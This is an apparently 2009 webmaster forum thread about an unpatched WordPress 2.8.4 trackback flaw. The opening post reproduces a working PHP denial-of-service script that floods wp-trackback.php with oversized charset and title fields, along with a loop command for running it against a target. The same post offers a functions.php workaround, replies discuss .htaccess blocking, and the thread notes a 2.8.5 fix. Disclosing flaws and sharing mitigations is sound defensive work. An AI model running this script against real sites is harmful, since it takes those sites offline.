wordpress security: *must read* exploit not fixed in 2.8.4 - GoFuckYourself.com

fris · 10-20-2009, 08:45 AM

Theirs currently an exploit out for 2.8.4 which isnt patched, that will allow someone to exhause your site using a DoS against certain file(s).

Here is the POC (proof of concept)

Code:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * [email protected] contacted and get a response,
 * but no solution available.
 * 
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
 * 
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 * 
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>

and Here is the *temp* fix until they patch it

add this to your themes functions.php file

Code:

<?php

// WP Trackback Temp Fix

function ft_stop_trackback_dos_attacks(){
        global $pagenow;
        if ( 'wp-trackback.php' == $pagenow ){
                // DoS attack fix.
                if ( isset($_POST['charset']) ){
                        $charset = $_POST['charset'];
                        if ( strlen($charset) > 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

Lace · 10-20-2009, 08:59 AM

Damn, just went and updated all of my sites recently too.

Thanks, Fris.

Cutty · 10-20-2009, 09:08 AM

Thanks mate, cheerio.

Ginn · 10-20-2009, 09:10 AM

Thanks for the info. I'll update everything now.

greg80 · 10-20-2009, 09:40 AM

what are you upgrading to? He said exploit still exists in 2.8.4 (current version)

greg80 · 10-20-2009, 09:40 AM

Quote:

Originally Posted by greg80

what are you upgrading to? He said exploit still exists in 2.8.4 (current version)

edit: ok, I read it again. Thanks fris.

Cyber Fucker · 10-20-2009, 09:46 AM

Thx for the info!

TheDA · 10-20-2009, 09:59 AM

Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

CYF · 10-20-2009, 10:02 AM

bumping up some good info, thanks fris

Stephen · 10-20-2009, 10:58 AM

Quote:

Originally Posted by CYF

bumping up some good info, thanks fris

ditto and thanks

skinnay · 10-20-2009, 11:07 AM

this is no where near the risk of the vulnerability that was recently patched by wordpress.

fris · 10-20-2009, 01:11 PM

Quote:

Originally Posted by TheDA

Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php

Nicky · 10-20-2009, 01:19 PM

Thanks man, updating the most important one snow, will wait for new release for the smaller blogs.

TheSenator · 10-20-2009, 01:43 PM

Shit....this may help some people...Its a plugin

http://fullthrottledevelopment.com/w...ck-dos-attacks

I turned off my trackbacks years ago but I think it is still there to exploit.

TheDA · 10-20-2009, 03:22 PM

Quote:

Originally Posted by fris

its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php

What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

Big E · 10-20-2009, 03:24 PM

If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess?

<Files wp-trackback.php>
Order Deny,Allow
Deny from all
</Files>

fris · 10-20-2009, 03:39 PM

Quote:

Originally Posted by TheDA

What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

yes you can add it to file called functions.php if you dont have one currently

TheDA · 10-20-2009, 03:50 PM

Quote:

Originally Posted by fris

yes you can add it to file called functions.php if you dont have one currently

Okay, thanks.

digifan · 10-20-2009, 03:54 PM

Awesome, thanks guys!

fatfoo · 10-20-2009, 03:59 PM

Exploit not fixed? Thanks for posting. Interesting read.

d-null · 10-20-2009, 04:10 PM

thanks for the info...

fuck wordpress is a pain in the ass

digitaldivas · 10-20-2009, 04:12 PM

...good looking out Fris

Argos88 · 10-20-2009, 05:04 PM

the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

18teens · 10-20-2009, 05:42 PM

Thanks for the info.

fris · 10-20-2009, 06:34 PM

Quote:

Originally Posted by Argos88

the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

this actually hasnt been fixed, i asked one of the core wordpress developers in a chat this morning, their is a fix if you edit a certain file, but if you download 2.8.4 from the site, the issue is not fixed.

fris · 10-20-2009, 06:35 PM

nevermind 2.8.5 has been released with the fix

d-null · 10-20-2009, 08:13 PM

Quote:

Originally Posted by fris

nevermind 2.8.5 has been released with the fix

I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so

TheSenator · 10-20-2009, 08:34 PM

Quote:

Originally Posted by d-null

I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so

Well, I rather keeping upgrading then lose a day worth work fixing exploits. I have too much money invested in my WordPress blogs.

TheDA · 10-21-2009, 07:46 AM

Quote:

Originally Posted by fris

nevermind 2.8.5 has been released with the fix

Let's see what this version brings

10-20-2009, 08:59 AM	#2
Lace Too lazy to set a custom title Industry Role: Join Date: Mar 2004 Posts: 16,116	Damn, just went and updated all of my sites recently too. Thanks, Fris. __________________ Your Paysite Partner Strength In Numbers! StickyDollars \| RadicalCash \| KennysPennies \| HomegrownCash

10-20-2009, 09:10 AM	#4
Ginn Confirmed User Join Date: Apr 2009 Posts: 627	Thanks for the info. I'll update everything now. __________________ DIAMONDGAYS.com - fresh twinks and best ratio! Highly recommended!

10-20-2009, 09:40 AM	#5
greg80 Confirmed User Industry Role: Join Date: May 2007 Posts: 1,644	what are you upgrading to? He said exploit still exists in 2.8.4 (current version) __________________ Say no to GoDaddy and high renewal prices! Go with NameSilo - FREE private whois for life, $8.99 regstrations and renewals. Free redirects, emails, great control panel and more! NameSilo rocks!

10-20-2009, 09:46 AM	#7
Cyber Fucker Hmm Industry Role: Join Date: Sep 2005 Location: On an endless road around the world for rock and roll. Posts: 12,642	Thx for the info! __________________

10-20-2009, 10:02 AM	#9
CYF Coupon Guru Industry Role: Join Date: Mar 2009 Location: Minneapolis Posts: 10,973	bumping up some good info, thanks fris __________________ Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more! AmeriNOC Coupons \| Certified Hosting Coupons \| Hosting Coupons \| Domain Name Coupons

10-20-2009, 09:08 AM	#3
Cutty So Fucking Banned Join Date: Jan 2006 Posts: 1,265	Thanks mate, cheerio.

10-20-2009, 09:59 AM	#8
TheDA Confirmed User Industry Role: Join Date: May 2006 Posts: 4,665	Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;) Can the default functions.php just be copied over to the theme folder? What else needs to be done?

10-20-2009, 11:07 AM	#11
skinnay Confirmed User Join Date: Apr 2004 Location: NEW YORK CITY Posts: 2,274	this is no where near the risk of the vulnerability that was recently patched by wordpress. __________________ Make Real Green with ORGANIC SEO \| Blog post exchange \| Non-index page trades \| A-B C-D Trades [icq: 194-215-962] [mail: [email protected]]

10-20-2009, 01:19 PM	#13
Nicky Confirmed User Industry Role: Join Date: Mar 2003 Location: Sweden Posts: 30,069	Thanks man, updating the most important one snow, will wait for new release for the smaller blogs. __________________ gfynicky @ gmail.com

10-20-2009, 01:43 PM	#14
TheSenator Too lazy to set a custom title Industry Role: Join Date: Feb 2003 Location: NJ Posts: 13,336	Shit....this may help some people...Its a plugin http://fullthrottledevelopment.com/w...ck-dos-attacks I turned off my trackbacks years ago but I think it is still there to exploit. __________________ ISeekGirls.com since 2005

10-20-2009, 03:24 PM	#16
Big E Registered User Industry Role: Join Date: Mar 2002 Location: San Diego, CA Posts: 935	If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess? <Files wp-trackback.php> Order Deny,Allow Deny from all </Files>

10-20-2009, 03:54 PM	#19
digifan The Profiler Industry Role: Join Date: Oct 2002 Location: ICQ 76281726 and I'm female Posts: 14,618	Awesome, thanks guys! __________________ [email protected] Webair Rocks

10-20-2009, 03:59 PM	#20
fatfoo ICQ:649699063 Industry Role: Join Date: Mar 2003 Posts: 27,763	Exploit not fixed? Thanks for posting. Interesting read. __________________ Send me an email: [email protected]

10-20-2009, 04:10 PM	#21
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	thanks for the info... fuck wordpress is a pain in the ass

10-20-2009, 04:12 PM	#22
digitaldivas ..I Heart Cannibal Corpse Industry Role: Join Date: Sep 2007 Location: California Posts: 4,328	...good looking out Fris __________________ ...

10-20-2009, 05:04 PM	#23
Argos88 So Fucking Banned Industry Role: Join Date: Sep 2009 Posts: 1,732	the exploit is FIXED.. the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it. If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

10-20-2009, 05:42 PM	#24
18teens Confirmed User Industry Role: Join Date: Dec 2002 Posts: 1,605	Thanks for the info.

10-20-2009, 06:35 PM	#26
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	nevermind 2.8.5 has been released with the fix __________________ Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff